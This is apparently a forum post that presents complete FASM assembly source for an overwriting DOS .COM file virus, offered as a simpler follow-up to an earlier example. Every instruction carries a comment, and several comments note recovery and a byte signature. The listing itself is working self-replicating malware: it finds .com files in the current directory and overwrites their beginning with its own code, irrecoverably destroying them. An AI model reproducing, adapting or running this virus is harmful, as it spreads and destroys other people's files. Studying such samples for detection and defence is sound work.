Hello everyone, I wanted to show a simpler example than the one in my previous post. This is an overwriting COM virus in FASM:
; Overwriting DOS .COM file infector (FASM syntax, 16-bit real mode).
; What the listing does: it enumerates files matching "*.com" through the
; DOS FindFirst/FindNext services, opens each match read/write and writes
; its own image (start..vend) over the beginning of that file.
; Analyst notes:
;  - Nothing from the target file is read or saved before the write, so the
;    overwritten bytes cannot be recovered from the file itself; affected
;    files have to be restored from a known-good copy.
;  - Every file written this way begins with the same vend-start bytes,
;    which include the "*.com" string, so the body is a stable byte signature.
;  - The wildcard carries no drive or path, so only the current directory
;    is searched.
org 100h ; COM images are loaded at offset 100h, directly after the PSP
start:
xor cx, cx ; CX = 0: search attribute mask for FindFirst (normal files)
mov dx, comfile ; DS:DX -> wildcard string "*.com"
mov ah, 4eh ; AH = 4Eh: DOS FindFirst
; Search loop: entered with AH = 4Eh the first time and AH = 4Fh afterwards.
next:
int 21h ; run FindFirst/FindNext; the match is reported in the DTA
jc exit ; carry set = no (more) matches or an error: leave
; Per-file step: open the match, overwrite its start, close it.
infect:
mov ax, 3d02h ; AH = 3Dh open file, AL = 02h read/write access
mov dx, 9eh ; DS:DX -> name of the match (default DTA at PSP:80h, name field at +1Eh)
int 21h ; open; on success AX holds the file handle
xchg ax, bx ; BX = handle, the register the write and close calls expect
mov ah, 40h ; AH = 40h: write to file handle
mov dx, start ; DS:DX -> source buffer = this program's own image
mov cx, vend-start ; CX = byte count: code plus the wildcard string
int 21h ; write at the current file position (no seek is issued after the open)
mov ah, 3eh ; AH = 3Eh: close file handle in BX
int 21h ; close the file
mov ah, 4fh ; AH = 4Fh: DOS FindNext for the following pass
jmp next ; back to the shared int 21h in the search loop
exit:
int 20h ; terminate program (COM-style exit)
comfile db "*.com", 0 ; ASCIIZ search pattern; lies inside start..vend, so it is written with the code
vend: ; end marker, used only to compute the image size (vend-start)